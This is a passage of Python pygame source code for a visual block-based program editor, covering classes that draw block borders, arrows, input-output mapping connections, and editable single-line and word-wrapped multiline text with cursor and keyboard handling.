sz[1] / scArea > self.block.g_absPlacement.scale:\n return\n\n # Find the position.\n pt = self.block.g_absPlacement.parentPoint(self.pt, scArea)\n r = self.block.g_absPlacement.parentLength(self.radius, scArea)\n\n # 3. Check if it needs to be scaled.\n self.sFactor = sFactor = 2. * r / sz[0]\n\n # Cutoff - don't draw.\n if sFactor > 0.3:\n # Scale it if needed.\n if sFactor < 1.:\n sz = [int(round(i * sFactor)) for i in sz]\n surface = pygame.transform.scale(surface, sz)\n\n # 4. Put the text.\n screen.blit(surface, [pt[i] - 0.5* sz[i] for i in (0,1)])\n\nclass EscapeText(Text):\n interactive = True\n def __init__(self, block, escapeBlock, radius, pt, font=None):\n super(EscapeText, self).__init__(block, '', radius, pt, tEsColour, font)\n self.escapeBlock = escapeBlock\n\n def draw(self, screen):\n # Update the text from the escape route.\n self.text = self.escapeBlock.comment\n super(EscapeText, self).draw(screen)\n\n def checkMouseHover(self, pt):\n return False\n\nclass Arrows(Feature):\n __slots__ = ['block', 'pts']\n def __init__(self, block, pts):\n '''Draws right-facing arrow heads at the specified points.'''\n self.block = block\n self.pts = pts\n\n def draw(self, screen):\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n a = 0.07\n for x,y in self.pts:\n x1,y1 = pl.parentPoint((x-a, y-a), scArea)\n x2,y2 = pl.parentPoint((x,y), scArea)\n x3,y3 = pl.parentPoint((x-a,y+a), scArea)\n pygame.draw.polygon(screen, (0,0,0), [(x1,y1),(x2,y2), (x3,y3)])\n\nclass BlockBorder(Rectangle):\n '''Defines the border of a block.'''\n\n def __init__(self, block, halfWidth, halfHeight, pt = (0., 0.)):\n super(BlockBorder, self).__init__(block, halfWidth, halfHeight, pt=pt)\n self.hoverEdge = None\n self.hoverRange = (halfWidth * halfHeight / 161.8) ** 0.5\n self.highlightWidth = self.hoverRange / 6.\n\n def draw(self, screen):\n # Draw the bounding rectangle.\n super(BlockBorder, self).draw(screen)\n\n # Also draw any escapes passing through this block.\n escChilds = [ch for ch in self.block.g_children if \\\n len([e for e in ch.passingEscapes if \\\n e in self.block.passingEscapes])]\n\n if len(escChilds):\n if self.block.g_absPlacement.scale >= self.block.g_sizeCutoff:\n x0,y0 = self.pt\n pos2 = (x0+self.halfWidth, y0-self.halfHeight)\n\n # Create one escape route and reuse it.\n route = EscapeRoute(self.block, pos2, pos2, 0.)\n\n for ch in escChilds:\n x0, y0 = ch.g_border.pt\n pos1 = (x0+ch.g_border.halfWidth, y0-ch.g_border.halfHeight)\n pl = ch.g_relPlacement\n pos1 = pl.parentPoint(pos1, self.block.g_absPlacement.area)\n ang = pl.parentAngle(-0.25 * pi)\n\n route.pos1 = pos1\n route.theta1 = ang\n route.draw(screen)\n\n self.drawn = True\n\n def drawSelected(self, screen):\n self.type = RectType.Selected\n self.draw(screen)\n self.type = RectType.Boundary\n\n def pointWithin(self, point):\n '''(point) - Checks if the specified point lies within the border.'''\n return abs(point[0]) <= self.halfWidth and \\\n abs(point[1]) <= self.halfHeight\n\n def checkMouseHover(self, point):\n '''(point, screen)'''\n\n if isinstance(self.block, sourceFile.MasterBlock):\n return False\n\n if not self.pointWithin(point):\n return False\n\n # Check the different borders.\n if point[1] + self.halfHeight < self.hoverRange:\n self.hoverEdge = 0\n return True\n if point[1] - self.halfHeight > -self.hoverRange:\n self.hoverEdge = 1\n return True\n if point[0] + self.halfWidth < self.hoverRange:\n self.hoverEdge = 2\n return True\n if point[0] - self.halfWidth > -self.hoverRange:\n self.hoverEdge = 3\n return True\n return False\n\n def mouseHover(self, screen):\n hd = self.highlightWidth\n if self.hoverEdge == 0:\n Rectangle(self.block, self.halfWidth, hd, \\\n RectType.Insert, (0., -self.halfHeight+hd)).draw(screen)\n elif self.hoverEdge == 1:\n Rectangle(self.block, self.halfWidth, hd, \\\n RectType.Insert, (0., self.halfHeight-hd)).draw(screen)\n elif self.hoverEdge == 2:\n Rectangle(self.block, hd, self.halfHeight, \\\n RectType.Insert, (-self.halfWidth+hd, 0.)).draw(screen)\n elif self.hoverEdge == 3:\n Rectangle(self.block, hd, self.halfHeight, \\\n RectType.Insert, (self.halfWidth-hd, 0.)).draw(screen)\n\n def mouseClick(self, actor):\n # Set the mode.\n actor.setMode(SysMode.Standard)\n\n # Set the selection.\n actor.setSelection(self.block)\n\n # Insert a new block.\n if self.hoverEdge == 0:\n actor.insertPar(False)\n elif self.hoverEdge == 1:\n actor.insertPar(True)\n elif self.hoverEdge == 2:\n actor.insertSeq(False)\n elif self.hoverEdge == 3:\n actor.insertSeq(True)\n\nclass MapFeature(InteractiveFeature):\n pathColours = (( 0, 0, 128),\n ( 0, 128, 0),\n (128, 0, 0),\n ( 0, 128, 128),\n (128, 0, 128),\n (128, 128, 0),\n ( 0, 64, 128),\n ( 64, 128, 0),\n (128, 0, 64),\n ( 0, 128, 64),\n (128, 64, 0),\n ( 64, 0, 128))\n\n def __init__(self, block, ht, inputs, outputs, mapping):\n if len(inputs) != mapping.numInputs:\n raise ValueError('mapping and inputs have different sizes')\n elif len(outputs) != mapping.numOutputs:\n raise ValueError('mapping and outputs have different sizes')\n\n self.block = block\n self.inputs = inputs\n self.outputs = outputs\n self.mapping = mapping\n self.height = ht\n\n self.highlight = [True, 0]\n self.selected = None\n self.hideHighlight = False\n self.hoverIn = None\n self.radius = 0.15 *self.height/max(len(self.inputs),len(self.outputs))\n\n def draw(self, screen):\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n self.radius = self.height*(0.03 + 0.05 / max(len(self.inputs), \\\n len(self.outputs)))\n r = int(round(pl.parentLength(self.radius, scArea)))\n\n # Draw the connections.\n clrIndex = 0\n for i in range(len(self.mapping)):\n j = self.mapping[i]\n p1, a1 = self.inputs[i]\n p2, a2 = self.outputs[j]\n c = Connection(self.block, p1, p2, a1, a2, self.pathColours[clrIndex])\n c.draw(screen)\n\n clrIndex = (clrIndex + 1) % len(self.pathColours)\n\n # Draw the input circles.\n for pt, angle in self.inputs:\n pt = tuple(int(i) for i in pl.parentPoint(pt, scArea))\n pygame.draw.circle(screen, mPtColour, pt, r)\n\n # Draw the output circles.\n for pt, angle in self.outputs:\n pt = tuple(int(i) for i in pl.parentPoint(pt, scArea))\n pygame.draw.circle(screen, mPtColour, pt, r)\n\n def checkMouseHover(self, pos):\n r2 = self.radius ** 2\n\n # Check for hover over input circles.\n self.hoverIn = True\n for i in range(len(self.inputs)):\n pt, angle = self.inputs[i]\n if sum((pos[i] - pt[i]) ** 2 for i in (0,1)) <= r2 * 1.6:\n self.hoverIndex = i\n return True\n\n # Check for hover over output circles.\n self.hoverIn = False\n for i in range(len(self.outputs)):\n pt, angle = self.outputs[i]\n if sum((pos[i] - pt[i]) ** 2 for i in (0,1)) <= r2 * 1.6:\n self.hoverIndex = i\n return True\n\n self.hoverIn = None\n return False\n\n def mouseHover(self, screen):\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n r = int(round(pl.parentLength(self.radius, scArea)))\n\n if self.hoverIn:\n # Highlight an input circle.\n pt, angle = self.inputs[self.hoverIndex]\n else:\n # Highlight an output circle.\n pt, angle = self.outputs[self.hoverIndex]\n\n pt = tuple(int(i) for i in pl.parentPoint(pt, scArea))\n pygame.draw.circle(screen, mHlColour, pt, r)\n\n # Hide the keyboard highlight.\n self.hideHighlight = True\n\n def mouseClick(self, actor):\n # Make sure that this mapping's selected.\n actor.mapClick(self)\n\n # Process the click.\n oldHighlight = self.highlight\n self.highlight = [self.hoverIn, self.hoverIndex]\n if self.select():\n actor.masterBlock.g_treeModified = True\n self.highlight = oldHighlight\n\n def enter(self, leftSide):\n '''Called when the mapping is entered in mapping mode.'''\n self.highlight[0] = leftSide\n self.selected = None\n if not self.fixHighlight():\n self.highlight[0] = not leftSide\n self.fixHighlight()\n\n def fixHighlight(self):\n 'internal.'\n if self.highlight[0]:\n if len(self.inputs) == 0:\n return False\n self.highlight[1] = min(self.highlight[1], len(self.inputs)-1)\n else:\n self.highlight[1] = min(self.highlight[1], len(self.outputs)-1)\n\n return True\n\n def drawSelected(self, screen):\n '''Called when the mapping is selected to draw selection.'''\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n r = int(round(pl.parentLength(self.radius, scArea)))\n\n # Calculate highlight.\n leftSide1, index = self.highlight\n if leftSide1:\n # Highlight an input circle.\n pt1, angle = self.inputs[index]\n else:\n # Highlight an output circle.\n pt1, angle = self.outputs[index]\n pt1 = tuple(int(i) for i in pl.parentPoint(pt1, scArea))\n\n if self.selected:\n # Calculate selection\n leftSide2, index = self.selected\n if leftSide2:\n # Highlight an input circle.\n pt2, angle = self.inputs[index]\n else:\n # Highlight an output circle.\n pt2, angle = self.outputs[index]\n\n pt2 = tuple(int(i) for i in pl.parentPoint(pt2, scArea))\n\n # Check for mouse-hovering line.\n if self.hoverIn != None:\n if self.hoverIn:\n pt3, angle = self.inputs[self.hoverIndex]\n else:\n pt3, angle = self.outputs[self.hoverIndex]\n pt3 = tuple(int(i) for i in pl.parentPoint(pt3, scArea))\n leftSide1 = self.hoverIn\n else:\n pt3 = pt1\n if self.hideHighlight:\n leftSide1 = leftSide2\n\n # Check for necessity of joining line.\n if leftSide1 != leftSide2:\n # Join two points with a line.\n pygame.draw.line(screen, trcColour, pt3, pt2)\n\n # Actually draw selection.\n pygame.draw.circle(screen, mSlColour, pt2, r)\n\n # Actually draw highlight.\n if not self.hideHighlight:\n pygame.draw.circle(screen, mHlColour, pt1, r)\n\n def up(self):\n if self.highlight[1] > 0:\n self.highlight[1] = self.highlight[1] - 1\n self.hideHighlight = False\n\n def down(self):\n self.highlight[1] = self.highlight[1] + 1\n self.fixHighlight()\n self.hideHighlight = False\n\n def left(self):\n self.hideHighlight = False\n if self.highlight[0]:\n return False\n else:\n self.highlight[0] = True\n if not self.fixHighlight():\n return False\n return True\n\n def right(self):\n self.hideHighlight = False\n if self.highlight[0]:\n self.highlight[0] = False\n self.fixHighlight()\n return True\n return False\n\n def select(self):\n 'Returns True if the block has changed.'\n if self.selected and self.selected[0] != self.highlight[0]:\n # Connect the points.\n if self.selected[0]:\n i,j = self.selected[1], self.highlight[1]\n self.selected = None\n else:\n j,i = self.selected[1], self.highlight[1]\n\n self.mapping.connections[i] = j\n return True\n else:\n self.selected = list(self.highlight)\n return False\n\n def cancel(self):\n 'Returns True if the cancel has been processed.'\n if self.selected:\n self.selected = None\n return True\n return False\n\nclass InteractiveText(InteractiveFeature):\n def __init__(self, block, pretext, posttext, values, radius, callback, \\\n pt=(0.,0.), bkgColour=None, font=None):\n '''(block, pretext, posttext, values, radius, callback, point, font)\n - defines an interactive text element.\n\n block: the block to which this element belongs.\n pretext: a list of fixed text strings which will appear at the start\n of each line of text.\n posttext: a list of fixed text strings which will appear at the end\n of each line of text.\n values: a list of the editable pieces of text, which is wedged\n between the pretext and posttext of each line.\n radius: the radius of the circle within which the entire feature\n must remain.\n callback: a callback function which will be called with the values\n list as its argument when the text changes. Can also be\n a tuple containing a callback function and a list, in\n which case, fn(values, *list) is called.\n pt: the position of the text. Defaults to (0,0).\n bkgColour: if specified, fills in the area behind the text with the\n given colour.\n '''\n self.block = block\n self.pretext = pretext\n self.posttext = posttext\n self.values = list(values)\n self.callback = callback\n self.pt = pt\n self.radius = radius\n self.bkgColour = bkgColour\n self.textSz = None\n\n assert len(values) == len(pretext) == len(posttext)\n\n self.cursorPos = [0, 0]\n self.selStart = 0\n self.selLength = 0\n self.highlightMotion = False\n self.keyEvent = None\n\n if font == None:\n try:\n self.font = Text.defaultFont\n except AttributeError:\n self.font = Text.defaultFont = pygame.font.Font(None, 24)\n else:\n self.font = font\n\n try:\n InteractiveText.cursor\n except AttributeError:\n InteractiveText.cursor = ((len(ibeam_strings[0]),len(ibeam_strings)),\\\n (3, 7)) + \\\n pygame.cursors.compile(ibeam_strings)\n\n def tick(self):\n if self.keyEvent:\n # Repeated keypress processing.\n if time.time() >= self.repeatTime:\n self.processKeystroke(self.keyEvent)\n self.repeatTime = time.time() + repeatRate\n self.block.g_treeModified = True\n\n def draw(self, screen):\n scsz = screen.get_size()\n self.scArea = scArea = 0.25 * scsz[0] * scsz[1]\n\n # 1. Render the text.\n lineSize = self.font.get_linesize()\n height = width = 0\n surfaces = []\n for i in range(len(self.values)):\n s1 = self.font.render(self.pretext[i], False, fTxColour).convert()\n s2 = self.font.render(self.values[i], False, vTxColour).convert()\n s3 = self.font.render(self.posttext[i], False, fTxColour).convert()\n\n surfaces.append((s1,s2,s3))\n height = height + lineSize\n width = max(width, s1.get_width()+s2.get_width()+s3.get_width())\n lastHeight = max(s1.get_height(), s2.get_height(), s3.get_height())\n\n # Adjust for hanging characters in the last line.\n if lastHeight > lineSize:\n height = height + lastHeight - lineSize\n\n # 2. Piece it all together.\n surface = pygame.Surface((width, height)).convert()\n if self.bkgColour:\n surface.fill(self.bkgColour)\n else:\n surface.fill(bkgColour)\n surface.set_colorkey(bkgColour)\n y = 0.\n for s1,s2,s3 in surfaces:\n x1,x2,x3 = (s.get_width() for s in (s1,s2,s3))\n x = 0.5 * (width - x1 - x2 - x3)\n surface.blit(s1, (x, y))\n x = x + x1\n surface.blit(s2, (x, y))\n x = x + x2\n surface.blit(s3, (x, y))\n y = y + lineSize\n\n # Find the position.\n pt = self.block.g_absPlacement.parentPoint(self.pt, scArea)\n r = self.block.g_absPlacement.parentLength(self.radius, scArea)\n\n # 3. Check if it needs to be scaled.\n self.sFactor = sFactor = 2. * r / (width ** 2 + height ** 2) ** 0.5\n\n # Cutoff - don't draw.\n if sFactor > 0.3:\n # Scale it if needed.\n if sFactor < 1.:\n width = int(round(width * sFactor))\n height = int(round(height * sFactor))\n surface = pygame.transform.scale(surface, (width, height))\n\n # 4. Put the text.\n putPos = (pt[0] - 0.5*width, pt[1] - 0.5*height)\n screen.blit(surface, putPos)\n self.textSz = (0.5*width, 0.5*height)\n\n # Draw a fine border.\n pygame.draw.rect(screen, bdrColour, \\\n pygame.Rect(putPos, (width, height)), 1)\n else:\n self.textSz = None\n\n def drawFinding(self, screen):\n '''Draws this block when the cursors resting on it but it hasn't yet\n been entered.'''\n if self.textSz == None:\n return\n\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n halfWidth, halfHeight = self.textSz\n x0,y0 = pl.parentPoint(self.pt, scArea)\n x1,y1 = (x0-halfWidth, y0-halfHeight)\n x2,y2 = (x0+halfWidth, y0-halfHeight)\n x3,y3 = (x0+halfWidth, y0+halfHeight)\n x4,y4 = (x0-halfWidth, y0+halfHeight)\n polygon = [(x1,y1),(x2,y2),(x3,y3),(x4,y4)]\n\n borderColour, fillColour, thickness = RectType.Selected\n\n if fillColour:\n pygame.draw.polygon(screen, fillColour, polygon)\n if borderColour:\n pygame.draw.polygon(screen, borderColour, polygon, thickness)\n\n def drawSelected(self, screen):\n if self.textSz == None:\n return\n\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n x0, y0 = pl.parentPoint(self.pt, scArea)\n\n # Choose the appropriate line.\n n, m = self.cursorPos\n lineSize = self.font.get_linesize()\n y = lineSize * n\n\n if self.selLength != 0:\n m = self.selStart\n\n # Get the sizes of the different sections.\n s1 = self.font.size(self.pretext[n])[0]\n s2a = self.font.size(self.values[n][:m])[0]\n s2b = self.font.size(self.values[n][m:])[0]\n s3 = self.font.size(self.posttext[n])[0]\n\n # Draw a cursor line.\n x = 0.5 * (s1 + s2a - s2b - s3)\n if self.sFactor < 1.:\n x = x * self.sFactor\n y = y * self.sFactor\n lineSize = lineSize * self.sFactor\n\n pt0 = (x0 + x, y0 - self.textSz[1] + y)\n\n if self.selLength == 0:\n pt1 = (x0 + x, y0 - self.textSz[1] + y + lineSize)\n pygame.draw.line(screen, csrColour, pt0, pt1)\n else:\n # Create a surface of the selected text.\n m2 = m + self.selLength\n s = self.font.render(self.values[n][m:m2], False, \\\n tuple(255-i for i in csrColour), csrColour)\n s.set_colorkey(None)\n\n if self.sFactor < 1.:\n width, height = s.get_size()\n width = int(round(width * self.sFactor))\n height = int(round(height * self.sFactor))\n s = pygame.transform.scale(s, (width, height))\n screen.blit(s, pt0)\n\n def checkMouseHover(self, pos):\n # Check for text not showing.\n if self.textSz == None:\n return False\n\n # Now check for hover over text.\n mPt = self.block.g_absPlacement.parentPoint(pos, self.scArea)\n tPt = self.block.g_absPlacement.parentPoint(self.pt, self.scArea)\n\n if tPt[0] - self.textSz[0] < mPt[0] < tPt[0] + self.textSz[0]:\n if tPt[1] - self.textSz[1] < mPt[1] < tPt[1] + self.textSz[1]:\n self.hoverPos = mPt\n return True\n return False\n\n def mouseHover(self, screen):\n # Do nothing special on a hover.\n pass\n\n def mouseClick(self, actor):\n # Make sure that this text's selected.\n actor.txtClick(self)\n\n # Set the cursor position.\n self.highlightMotion = False\n self.moveCursor(self.getClickPoint(self.hoverPos))\n\n def mouseDrag(self, event):\n self.highlightMotion = True\n self.moveCursor(self.getClickPoint(event.pos))\n\n def getClickPoint(self, point):\n '''internal. Returns the coordinates of the specified screen position.\n '''\n\n pl = self.block.g_absPlacement\n x0, y0 = pl.parentPoint(self.pt, self.scArea)\n\n # First find the correct row for the cursor.\n x = point[0] - x0\n y = point[1] - y0 + self.textSz[1]\n\n lineSize = self.font.get_linesize()\n if self.sFactor < 1.:\n lineSize = lineSize * self.sFactor\n x = x / self.sFactor\n\n if self.highlightMotion:\n n = self.cursorPos[0]\n else:\n n = min(int(y // lineSize), len(self.values) - 1)\n\n # Now find the correct column.\n s1 = self.font.size(self.pretext[n])[0]\n s2 = self.font.size(self.values[n])[0]\n s3 = self.font.size(self.posttext[n])[0]\n\n # 1. Guess the position.\n if x <= 0.5 * (s1 - s2 - s3):\n m = 0\n elif x >= 0.5 * (s1 + s2 - s3):\n m = len(self.values[n])\n else:\n dist = (0.5*(s2 + s3 - s1) + x)\n m = int(round(len(self.values[n]) * dist / s2))\n\n # 2. Refine the guess.\n gDist = self.font.size(self.values[n][:m])[0]\n\n if gDist < dist:\n # We guessed too low.\n while gDist < dist:\n diff = dist - gDist\n m = m + 1\n gDist = self.font.size(self.values[n][:m])[0]\n\n # We found the turning point.\n if diff < gDist - dist:\n m = m - 1\n elif gDist > dist:\n # We guessed too high.\n while gDist > dist:\n diff = gDist - dist\n m = m - 1\n gDist = self.font.size(self.values[n][:m])[0]\n\n # Found the turning point.\n if diff < dist - gDist:\n m = m + 1\n\n # 3. Return the value.\n return [n, m]\n\n def moveCursor(self, pt):\n 'internal. Moves the cursor within a row.'\n newY, newX = pt\n if newY != self.cursorPos[0]:\n self.cursorPos = pt\n self.selLength = 0\n elif not self.highlightMotion:\n self.cursorPos[1] = newX\n self.selLength = 0\n else:\n if not self.selLength:\n selEnd = self.cursorPos[1]\n elif self.selStart == self.cursorPos[1]:\n selEnd = self.selStart + self.selLength\n else:\n selEnd = self.selStart\n\n if newX < selEnd:\n self.selLength = selEnd - newX\n self.selStart = newX\n else:\n self.selLength = newX - selEnd\n self.selStart = selEnd\n\n self.cursorPos[1] = newX\n\n self.block.master.g_treeModified = True\n\n def blankSelection(self):\n 'internal. Blanks the selection. Returns True if there was one.'\n if not self.selLength:\n return False\n n,m = self.cursorPos[0], self.selStart\n self.values[n] = self.values[n][:m] + self.values[n][m+self.selLength:]\n self.selLength = 0\n self.cursorPos[1] = self.selStart\n return True\n\n def keyUp(self, event, actor):\n 'internal. A key has been released.'\n if self.keyEvent and event.key == self.keyEvent.key:\n self.keyEvent = None\n\n def keyPress(self, event, actor):\n 'internal. A key has been pressed.'\n self.keyEvent = event\n self.actor = actor\n self.processKeystroke(event)\n self.repeatTime = time.time() + repeatLag\n\n def processKeystroke(self, event):\n 'internal. Process a keystroke.'\n\n char = keyboard.charPressed(event.key, event.mod)\n if isinstance(char, str):\n # Translates to a char.\n self.blankSelection()\n n,m = self.cursorPos\n self.values[n] = self.values[n][:m] + char + \\\n self.values[n][m:]\n self.cursorPos[1] = m + 1\n else:\n key, mod = char\n self.highlightMotion = mod & pgl.KMOD_SHIFT\n mod = mod & ~ pgl.KMOD_SHIFT\n n,m = self.cursorPos\n\n if mod == 0:\n if key == keyboard.Return:\n # Enter.\n self.actor.txtDone()\n elif key == keyboard.Left:\n # Left arrow.\n self.moveCursor([n, max(0, m - 1)])\n elif key == keyboard.Right:\n # Right arrow.\n self.moveCursor([n, min(m + 1, len(self.values[n]))])\n elif key == keyboard.Up:\n # Up arrow.\n self.cursorPos[0] = max(0, n - 1)\n self.cursorPos[1] = min(self.cursorPos[1],\n len(self.values[self.cursorPos[0]]))\n self.selLength = 0\n elif key == keyboard.Down:\n # Down arrow.\n self.cursorPos[0] = min(n + 1, len(self.values) - 1)\n self.cursorPos[1] = min(self.cursorPos[1],\n len(self.values[self.cursorPos[0]]))\n self.selLength = 0\n elif key == keyboard.Home:\n # Home key.\n self.moveCursor([n, 0])\n elif key == keyboard.End:\n # End key.\n self.moveCursor([n, len(self.values[n])])\n elif key == keyboard.Backspace:\n # Backspace.\n if not self.blankSelection():\n n,m = self.cursorPos\n if m > 0:\n self.values[n] = self.values[n][:m-1] + self.values[n][m:]\n self.cursorPos[1] = m - 1\n else:\n return\n elif key == keyboard.Delete:\n # Delete.\n if not self.blankSelection():\n n,m = self.cursorPos\n if m < len(self.values[n]):\n self.values[n] = self.values[n][:m] + \\\n self.values[n][m+1:]\n else:\n return\n else:\n return\n elif mod == pgl.KMOD_LCTRL:\n if key == keyboard.Left:\n # Move left one word.\n n1, m1 = n, m\n wordStarted = False\n while True:\n if m1 == 0:\n if n1 == 0:\n break\n n1 = n1 - 1\n m1 = len(self.values[n1]) - 1\n else:\n m1 = m1 - 1\n if self.values[n1][m1] == ' ':\n if wordStarted:\n break\n else:\n wordStarted = True\n\n n, m = n1, m1\n self.moveCursor([n, m])\n elif key == keyboard.Right:\n # Move right one word.\n n1, m1 = n, m\n wordStarted = False\n while True:\n if m1 == len(self.values[n1]) - 1:\n if n1 == len(self.values) - 1:\n break\n n1 = n1 + 1\n m1 = 0\n else:\n m1 = m1 + 1\n if self.values[n1][m1] == ' ':\n if wordStarted:\n break\n else:\n wordStarted = True\n n, m = n1, m1\n self.moveCursor([n, m + 1])\n elif key == keyboard.Home:\n # Move to the top of the feature.\n self.moveCursor([0, 0])\n elif key == keyboard.End:\n # Move to the end of the feature.\n self.moveCursor([len(self.values)-1,\n len(self.values[-1])])\n else:\n return\n else:\n return\n\n self.block.master.g_treeModified = True\n\n def setValues(self, values):\n self.values = values\n\n n, m = self.cursorPos\n if n > len(self.values):\n n = len(self.values)\n if m > len(self.values[n]):\n m = 0\n self.cursorPos = [n, m]\n\n def save(self):\n 'Calls the notify function about the changes.'\n if isinstance(self.callback, tuple):\n fn, args = self.callback\n fn(self.values, *args)\n else:\n self.callback(self.values)\n\n self.block.master.g_treeModified = True\n\n n,m = self.cursorPos\n if m > len(self.values[n]):\n self.cursorPos[1] = 0\n\n self.keyEvent = None\n\n def beginEdit(self):\n 'Called when this element\\'s first entered.'\n # Select the whole first line of text.\n self.cursorPos = [0, 0]\n self.selStart = 0\n self.selLength = len(self.values[0])\n\nclass MultilineText(InteractiveFeature):\n def __init__(self, block, values, radius, callback, \\\n pt=(0.,0.), bkgColour=None, minWrapWidth=150, \\\n followText='', font=None):\n '''(block, values, radius, callback, point, font)\n - defines a multiline text element.\n\n block: the block to which this element belongs.\n values: a list of the lines of text.\n radius: the radius of the circle within which the entire feature\n must remain.\n callback: a callback function which will be called with the values\n list as its argument when the text changes. May also be\n a tuple of the form (fn, args), in which case the callback\n will execute fn(values, *args).\n pt: the position of the text. Defaults to (0,0).\n bkgColour: if specified, fills in the area behind the text with the\n given colour.\n minWrapWidth: the minimum width to which text will be wrapped in\n pixels.\n followText: a string of text to put at the start of any wrapped line.\n '''\n self.block = block\n self.values = list(values)\n self.callback = callback\n self.pt = pt\n self.radius = radius\n self.bkgColour = bkgColour\n self.textSz = None\n self.minWrapWidth = minWrapWidth\n\n self.cursorPos = [0, 0]\n self.selStart = [0, 0]\n self.selLength = 0\n self.selLines = 0\n\n self.highlightMotion = False\n self.keyEvent = None\n\n if font == None:\n try:\n self.font = Text.defaultFont\n except AttributeError:\n self.font = Text.defaultFont = pygame.font.Font(None, 24)\n else:\n self.font = font\n\n self.followText = followText\n self.followSurface = self.font.render(followText, False, fTxColour)\n self.followWidth = self.followSurface.get_width()\n self.screenWidth = 1024\n self.wordWrap()\n\n try:\n MultilineText.cursor\n except AttributeError:\n try:\n InteractiveText.cursor\n except AttributeError:\n InteractiveText.cursor = ((len(ibeam_strings[0]),len(ibeam_strings)),\\\n (3, 7)) + \\\n pygame.cursors.compile(ibeam_strings)\n MultilineText.cursor = InteractiveText.cursor\n\n def wordWrap(self):\n 'Recalculates the position of line breaks due to word wrapping.'\n\n # Find the height and width of the non-wrapped text.\n # Take into account a minimum wrap width.\n lineSize = self.font.get_linesize()\n numValues = len(self.values)\n assert len(self.values) > 0\n small = max(lineSize * numValues, self.minWrapWidth)\n big = min(max(self.font.size(l)[0] for l in self.values), \\\n self.screenWidth)\n\n if small >= big:\n # Height is greater than width. Line wrapping to maximum width.\n self.wrappedLines, self.lines = self.wrapToWidth(self.screenWidth)\n return\n\n # 5 iterations of algorithm.\n for n in range(5):\n a = (big * small) ** 0.5\n wrappedLines, lines = self.wrapToWidth(a)\n b = lineSize * (len(wrappedLines) + numValues)\n\n # Update our big and small guesses.\n if a > b:\n big = min(a, big)\n small = max(b, small)\n else:\n big = min(b, big)\n small = max(a, small)\n\n if small >= big:\n break\n\n self.wrappedLines = wrappedLines\n self.lines = lines\n\n def wrapToWidth(self, width):\n '''Wraps the line breaks to a maximum line width of width.\n Returns (wrappedLines, lines) where lines is a list lines with this\n wrapping, and wrappedLines is a list of which lines terminate in\n artificial line breaks.'''\n\n i = 0\n follow = 0\n lines = list(self.values)\n wrappedLines = []\n while i < len(lines):\n l = lines[i]\n\n lWidth = self.font.size(l)[0] + follow\n if lWidth < width:\n # No splitting required.\n i = i + 1\n follow = 0\n continue\n\n # Guess where to split the line.\n m = int(round(width * len(l) / lWidth))\n\n # Move until we hit the right point.\n lWidth = self.font.size(l[:m])[0] + follow\n if lWidth >= width:\n while lWidth > width:\n m = m - 1\n lWidth = self.font.size(l[:m])[0] + follow\n else:\n lWidth = self.font.size(l[:m+1])[0] + follow\n while lWidth < width:\n m = m + 1\n lWidth = self.font.size(l[:m+1])[0] + follow\n\n startM = max(1, m)\n\n # Now count backwards until we hit a space.\n while m > 0:\n if l[m-1] == ' ':\n # Found the right point. Split here.\n break\n m = m - 1\n else:\n # Run out of line. Split where we thought at first.\n m = startM\n\n # Perform split.\n wrappedLines.append(i)\n lines.insert(i+1, l[m:])\n lines[i] = l[:m]\n follow = self.followWidth\n i = i + 1\n\n # Return the result.\n return wrappedLines, lines\n\n def screenPos(self, pt):\n '''internal. Convert from actual co-ordinates to displayed co-ordinates\n based on word wrap positions.'''\n\n n,m = pt\n\n # Get vertical position.\n for i in self.wrappedLines:\n if i == n:\n # Get horizontal position.\n if m <= len(self.lines[n]):\n break\n m = m - len(self.lines[n])\n elif i > n:\n break\n n = n + 1\n\n return [n, m]\n\n def actualPos(self, pt):\n '''internal. Convert from displayed co-ordinates to actual co-ordinates\n based on word wrap.'''\n\n n, m = pt\n if n == 0:\n return [n, m]\n\n # Get horizontal position.\n x = n - 1\n while x >= 0:\n if x not in self.wrappedLines:\n break\n m = m + len(self.lines[x])\n x = x - 1\n\n # Get vertical position.\n x = n\n for i in self.wrappedLines:\n if i >= x:\n break\n n = n - 1\n\n return [n, m]\n\n def tick(self):\n if self.keyEvent:\n # Repeated keypress processing.\n if time.time() >= self.repeatTime:\n self.processKeystroke(self.keyEvent)\n self.repeatTime = time.time() + repeatRate\n self.block.g_treeModified = True\n\n def draw(self, screen):\n scsz = screen.get_size()\n self.scArea = scArea = 0.25 * scsz[0] * scsz[1]\n\n # Fix for unknown screen width.\n if scsz[0] != self.screenWidth and self.selLength == 0 == self.selLines:\n self.screenWidth = scsz[0]\n pt = self.actualPos(self.cursorPos)\n self.wordWrap()\n self.cursorPos = self.screenPos(pt)\n\n # 1. Render the text.\n lineSize = self.font.get_linesize()\n height = width = 0\n surfaces = []\n for i in range(len(self.lines)):\n s = self.font.render(self.lines[i], False, vTxColour).convert()\n\n surfaces.append(s)\n height = height + lineSize\n w = s.get_width()\n if (i-1) in self.wrappedLines:\n w = w + self.followWidth\n width = max(width, w)\n lastHeight = s.get_height()\n\n # Adjust for hanging characters in the last line.\n if lastHeight > lineSize:\n height = height + lastHeight - lineSize\n\n # 2. Piece it all together.\n surface = pygame.Surface((width, height)).convert()\n if self.bkgColour:\n surface.fill(self.bkgColour)\n else:\n surface.fill(bkgColour)\n surface.set_colorkey(bkgColour)\n\n y = 0.\n for i in range(len(surfaces)):\n s = surfaces[i]\n x = 0\n\n if (i-1) in self.wrappedLines:\n # Indicate that line is wrapped\n surface.blit(self.followSurface, (x, y))\n x = x + self.followWidth\n\n surface.blit(s, (x, y))\n y = y + lineSize\n\n # Find the position.\n pt = self.block.g_absPlacement.parentPoint(self.pt, scArea)\n r = self.block.g_absPlacement.parentLength(self.radius, scArea)\n\n # 3. Check if it needs to be scaled.\n self.sFactor = sFactor = 2. * r / (width ** 2 + height ** 2) ** 0.5\n\n # Cutoff - don't draw.\n if sFactor > 0.3:\n # Scale it if needed.\n if sFactor < 1.:\n width = int(round(width * sFactor))\n height = int(round(height * sFactor))\n surface = 